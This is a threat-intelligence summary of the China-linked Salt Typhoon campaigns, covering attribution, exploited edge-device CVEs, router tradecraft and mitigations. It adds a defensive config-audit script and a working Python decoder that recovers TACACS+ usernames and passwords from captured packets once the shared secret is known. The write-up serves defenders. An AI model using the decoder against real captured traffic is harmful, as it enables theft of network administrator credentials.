Full Report
The U.S. National Security Agency (NSA), the UK's National Cyber Security Centre (NCSC), and partners from over a dozen countries have linked the Salt Typhoon global hacking campaigns to three China-based technology firms. [...]
Analysis Summary
# Threat Actor: Salt Typhoon
## Attribution & Identity
The threat actor, tracked as Salt Typhoon, is linked to **China-based technology firms** acting on behalf of **China's Ministry of State Security (MSS)** and the **People's Liberation Army (PLA)**.
Associated entities providing cyber products and services include:
* Sichuan Juxinhe Network Technology Co. Ltd.
* Beijing Huanyu Tianqiong Information Technology Co.
* Sichuan Zhixin Ruijie Network Technology Co. Ltd.
## Activity Summary
Salt Typhoon has been active since at least 2021, conducting global intrusion campaigns for cyber espionage. Its most visible recent activity is a sustained campaign against telecommunications providers aimed at intercepting private communications. The group was also linked to a nine-month intrusion into a U.S. Army National Guard network in 2024, during which it stole device configuration files and administrator credentials.
## Tactics, Techniques & Procedures
- Exploiting **widely known, already-patched flaws** in network edge devices rather than zero-days.
- Exploitation of specific vulnerabilities:
- **CVE-2024-21887** (Ivanti Connect Secure command injection)
- **CVE-2024-3400** (Palo Alto PAN-OS GlobalProtect command injection leading to RCE)
- **CVE-2023-20198** and **CVE-2023-20273** (Cisco IOS XE web UI privilege escalation and command injection)
- **CVE-2018-0171** (Cisco Smart Install RCE)
- Modifying Access Control Lists (ACLs) on compromised routers and other network devices to grant themselves access.
- Enabling SSH on non-standard ports on compromised devices.
- Creating GRE/IPsec tunnels from compromised devices for C2 and persistent access.
- Enabling the Cisco Guest Shell Linux container on IOS XE devices and using it for persistence.
- Pivoting into other networks over compromised devices and the trusted connections they hold.
- Running packet captures on compromised devices to collect authentication traffic (for example TACACS+).
- Redirecting TACACS+ authentication traffic by altering the configured TACACS+ server address.
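The packet-capture and configuration-theft techniques above reinforce each other, and the following added example (not code from the advisory or from the actor's tooling) shows why. TACACS+ (RFC 8907) does not encrypt packet bodies; it XORs them with an MD5-derived pad seeded by the shared secret that sits in the device configuration. An actor holding both a capture of the authentication traffic and the stolen configuration therefore recovers usernames and passwords directly. The shared secret, session ID, account name and password below are all constructed for the example.

```python
"""Added example: recovering credentials from captured TACACS+ authentication
traffic when the shared secret is known (e.g. taken from a stolen config).
Implements the RFC 8907 section 4.5 body obfuscation and a minimal decoder for
an authentication START packet. All keys and packet contents are constructed.
"""
import hashlib
import struct

HEADER_LEN = 12
TAC_PLUS_AUTHEN = 0x01               # packet type: authentication
TAC_PLUS_UNENCRYPTED_FLAG = 0x01     # header flag: body sent in the clear
TAC_PLUS_AUTHEN_TYPE_PAP = 0x02      # with PAP the 'data' field is the password


def tacacs_pad(session_id: int, key: bytes, version: int, seq_no: int, length: int) -> bytes:
    """RFC 8907 pseudo-pad: MD5_1 = MD5(session_id, key, version, seq_no) and
    MD5_n = MD5(session_id, key, version, seq_no, MD5_n-1), concatenated and
    truncated to the body length. session_id is 4 bytes, network byte order."""
    base = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(base + prev).digest()
        pad += prev
    return pad[:length]


def xor_body(body: bytes, session_id: int, key: bytes, version: int, seq_no: int) -> bytes:
    """Obfuscation and de-obfuscation are the same XOR with the same pad."""
    pad = tacacs_pad(session_id, key, version, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def build_authen_start(user: bytes, port: bytes, rem_addr: bytes, password: bytes) -> bytes:
    """Authentication START body (RFC 8907 section 5.1) for a PAP login."""
    action, priv_lvl, authen_type, service = 0x01, 0x01, TAC_PLUS_AUTHEN_TYPE_PAP, 0x01
    fixed = struct.pack("!8B", action, priv_lvl, authen_type, service,
                        len(user), len(port), len(rem_addr), len(password))
    return fixed + user + port + rem_addr + password


def build_packet(body_plain: bytes, session_id: int, key: bytes, seq_no: int = 1) -> bytes:
    """Wrap a body in a TACACS+ header and obfuscate it, as the NAS would."""
    version, flags = 0xC0, 0x00      # major version 0xC, minor 0; body obfuscated
    header = struct.pack("!BBBBII", version, TAC_PLUS_AUTHEN, seq_no, flags,
                         session_id, len(body_plain))
    return header + xor_body(body_plain, session_id, key, version, seq_no)


def recover_credentials(packet: bytes, key: bytes) -> dict:
    """What an actor with a capture and the shared secret does: parse the
    header, strip the pad and read the user/port/rem_addr/data fields."""
    version, ptype, seq_no, flags, session_id, length = struct.unpack(
        "!BBBBII", packet[:HEADER_LEN])
    if ptype != TAC_PLUS_AUTHEN:
        raise ValueError("not an authentication packet")
    body = packet[HEADER_LEN:HEADER_LEN + length]
    if not flags & TAC_PLUS_UNENCRYPTED_FLAG:
        body = xor_body(body, session_id, key, version, seq_no)
    _action, _priv, atype, _svc, ul, pl, rl, dl = struct.unpack("!8B", body[:8])
    fields, off = [], 8
    for n in (ul, pl, rl, dl):
        fields.append(body[off:off + n])
        off += n
    user, port, rem_addr, data = fields
    return {
        "user": user.decode(errors="replace"),
        "port": port.decode(errors="replace"),
        "rem_addr": rem_addr.decode(errors="replace"),
        "password": data.decode(errors="replace") if atype == TAC_PLUS_AUTHEN_TYPE_PAP else None,
    }


# Constructed sample: the secret as it would appear under 'tacacs server ... key'
SHARED_SECRET = b"tacacs-secret-from-stolen-config"   # hypothetical value
SAMPLE_PACKET = build_packet(
    build_authen_start(b"netadmin", b"vty0", b"10.0.0.5", b"Pa55w0rd!"),
    session_id=0x5EED1234, key=SHARED_SECRET)

if __name__ == "__main__":
    print(recover_credentials(SAMPLE_PACKET, SHARED_SECRET))
```

The practical consequence for defenders is that a leaked running-config is a credential leak for every TACACS+ session an attacker can sniff afterwards; rotating the TACACS+ shared secret belongs on the same checklist as rotating the administrator passwords.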
## Targeting
- Sectors: Government, telecommunications, transportation, lodging, and military networks.
- Geography: Worldwide targets, including the U.S. and Canada.
- Victims: Major U.S. carriers (AT&T, Verizon, Lumen), U.S. Army National Guard, and various government entities globally.
## Tools & Infrastructure
- Custom Go-based SFTP tools, observed under the names **"cmd1," "cmd3," "new2," and "sft,"** used to move files on and off compromised hosts.
- **JumbledPath**, a custom utility used to run packet captures on and monitor traffic within telecom networks.
- Infrastructure: Used GRE tunnels for persistent access and focused on exploiting network edge devices (routers/VPNs).
## Implications
Salt Typhoon is an active, state-sponsored cyber espionage operation focused on intelligence gathering, in particular communications interception and tracking the movements of high-value targets. Its use of known, already-patched vulnerabilities rather than zero-days shows a willingness to trade stealth for scale: the group targets the large population of unpatched edge devices, and weak patch management in the telecommunications sector is what makes the campaign work. Its reported access to carriers' law enforcement wiretap systems represents a severe threat to national security and individual privacy.
## Mitigations
- **Prioritize patching** internet-facing network edge devices, since the vulnerabilities in use are known and have fixes available.
- **Harden device configurations** against a known-good baseline and monitor for unauthorized changes.
- Restrict management services (SSH, SNMP, web UI) to dedicated, segmented management networks and ACL them to known administrator addresses.
- Enforce secure management protocols (SSHv2, SNMPv3) and disable their insecure predecessors.
- Disable legacy features such as **Cisco Smart Install (SMI)** and **Cisco Guest Shell** where not required.
- Hunt proactively for behavioral indicators (unexpected configuration changes, new tunnels, SSH on unusual ports, packet captures launched from the device) rather than relying solely on exploit signatures, because post-exploitation activity uses the device's own legitimate features and leaves few signature-detectable traces.
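The following added example (not code from the advisory or any vendor) turns the configuration-level tradecraft listed under Tactics, Techniques & Procedures and the mitigation checklist above into a baseline audit. It parses a Cisco IOS XE running-config and flags SSH on a non-standard port, tunnel interfaces to unapproved peers, management ACL entries that admit sources outside the trusted management prefix, a TACACS+ server that is not the approved one, IOx/Guest Shell application hosting, SNMPv1/v2c communities, the absence of `no vstack` (Smart Install) and the absence of `ip ssh version 2`. The sample configuration, the approved-address lists and the finding codes are all constructed for the example; the `show vstack config` and `show app-hosting list` commands named in the messages are real IOS XE commands for confirming the two findings that a config alone cannot settle.

```python
"""Added example: audit a Cisco IOS XE running-config for the configuration
changes Salt Typhoon is reported to make and for the hardening baseline
in the mitigations list. Sample config and allow-lists are constructed."""
import ipaddress
import re

# Operator-maintained baseline (hypothetical values).
APPROVED_TACACS = {"198.51.100.9"}
APPROVED_TUNNEL_PEERS = {"198.51.100.20"}
TRUSTED_MGMT_PREFIXES = [ipaddress.ip_network("10.10.0.0/16")]

# Constructed running-config showing several of the indicators at once.
SAMPLE_CONFIG = """\
hostname edge-rtr-01
!
iox
!
app-hosting appid guestshell
 app-vnic management guest-interface 0
!
ip ssh version 2
ip ssh port 7821 rotary 1
!
interface Tunnel9
 ip address 10.255.255.1 255.255.255.252
 tunnel source GigabitEthernet0/0/0
 tunnel destination 203.0.113.77
!
ip access-list extended MGMT-ACL
 permit tcp host 203.0.113.77 any eq 7821
 permit tcp 10.10.0.0 0.0.255.255 any eq 22
!
tacacs server ISE-1
 address ipv4 203.0.113.200
 key 7 0123456789ABCD
!
snmp-server community public RO
!
line vty 0 4
 rotary 1
 transport input ssh
"""


def parse_sections(config: str):
    """Group a running-config into (top-level line, [indented child lines])."""
    sections = []
    for raw in config.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue
        if raw.startswith(" "):
            if sections:
                sections[-1][1].append(raw.strip())
        else:
            sections.append((raw.strip(), []))
    return sections


def source_is_trusted(src: str) -> bool:
    """ACL source is 'host A.B.C.D', 'A.B.C.D WILDCARD' or 'any'; ipaddress
    accepts a wildcard (hostmask) after the slash, so 0.0.255.255 -> /16."""
    if src == "any":
        return False
    m = re.match(r"host (\S+)$", src)
    net = ipaddress.ip_network(m.group(1)) if m else ipaddress.ip_network(
        "/".join(src.split()), strict=False)
    return any(net.subnet_of(t) for t in TRUSTED_MGMT_PREFIXES)


def audit(config: str):
    """Return a list of (finding_code, evidence) tuples."""
    findings = []
    sections = parse_sections(config)
    top = {hdr for hdr, _ in sections}
    for hdr, body in sections:
        m = re.match(r"ip ssh port (\d+) rotary", hdr)
        if m and m.group(1) != "22":
            findings.append(("SSH_NONSTD_PORT", hdr))
        if hdr.startswith("interface Tunnel"):
            for c in body:
                m = re.match(r"tunnel destination (\S+)", c)
                if m and m.group(1) not in APPROVED_TUNNEL_PEERS:
                    findings.append(("UNEXPECTED_TUNNEL", f"{hdr} -> {m.group(1)}"))
        if hdr.startswith("ip access-list"):
            for c in body:
                m = re.match(r"permit \S+ (host \S+|any|\S+ \S+)", c)
                if m and not source_is_trusted(m.group(1)):
                    findings.append(("ACL_UNTRUSTED_SOURCE", f"{hdr}: {c}"))
        if hdr.startswith("tacacs server"):
            for c in body:
                m = re.match(r"address ipv4 (\S+)", c)
                if m and m.group(1) not in APPROVED_TACACS:
                    findings.append(("TACACS_REDIRECTED", f"{hdr} -> {m.group(1)}"))
        if hdr == "iox" or hdr.startswith("app-hosting appid"):
            findings.append(("GUESTSHELL_IOX", f"{hdr}; confirm with 'show app-hosting list'"))
        if hdr.startswith("snmp-server community"):
            findings.append(("SNMP_V1V2C", hdr))
    if "no vstack" not in top:
        findings.append(("SMART_INSTALL_CHECK", "no 'no vstack' line; confirm with 'show vstack config'"))
    if "ip ssh version 2" not in top:
        findings.append(("SSH_V1_ALLOWED", "ip ssh version 2 not set"))
    return findings


if __name__ == "__main__":
    for code, evidence in audit(SAMPLE_CONFIG):
        print(f"{code:22} {evidence}")
```

Run it against configs pulled by your normal backup tooling and diff the finding list between pulls; a new `UNEXPECTED_TUNNEL`, `SSH_NONSTD_PORT` or `TACACS_REDIRECTED` on a device nobody changed is exactly the behavioral signal the last mitigation asks for.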